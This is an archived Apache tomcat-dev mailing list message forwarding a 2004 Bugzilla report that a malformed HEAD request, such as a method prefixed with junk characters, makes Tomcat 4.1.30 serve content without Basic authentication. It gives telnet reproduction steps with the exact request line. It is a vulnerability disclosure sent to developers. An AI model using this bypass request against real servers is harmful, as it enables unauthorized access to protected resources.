tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From bugzi...@apache.org
Subject DO NOT REPLY [Bug 28778] New: - Malformed HEAD method can bypass (basic) authentication.
Date Wed, 05 May 2004 12:21:23 GMT
DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG 
RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT
<http://issues.apache.org/bugzilla/show_bug.cgi?id=28778>.
ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND 
INSERTED IN THE BUG DATABASE.

http://issues.apache.org/bugzilla/show_bug.cgi?id=28778

Malformed HEAD method can bypass (basic) authentication.

           Summary: Malformed HEAD method can bypass (basic) authentication.
           Product: Tomcat 4
           Version: 4.1.30
          Platform: PC
        OS/Version: Windows XP
            Status: NEW
          Severity: Major
          Priority: Other
         Component: Unknown
        AssignedTo: tomcat-dev@jakarta.apache.org
        ReportedBy: gates_na@yahoo.com


If the HEAD word is preceded by any nonspace characters it behaves as a GET 
method but no authentication is requested.
Reproduce:
- Secure some resource ex. "/*" with Basic authentication
- Telnet into Tomcat like "telnet localhost 8080"
- Type correct GET request "GET / HTTP/1.0" you should receive “401 
Unauthorized”
- Type correct HEAD request "HEAD / HTTP/1.0" you should receive “401 
Unauthorized” but you get “200 OK” without content which is already violation 
of RFC 2068 because it says: "The metainformation contained in the HTTP 
headers in response to a HEAD request SHOULD be identical to the information 
sent in response to a GET request."
- Type incorrect HEAD request "jhlkjhHEAD / HTTP/1.0" you should receive like 
above but you get what you would by sending GET as if there was no need for 
authentication.

I think this is a serious security problem. One could modify a browser to 
bypass any authentication.
I have tried this on a context other than the defaults.
I have also used my own users and role.
I didn’t try it with other authentications.

---------------------------------------------------------------------
To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org


Mime
View raw message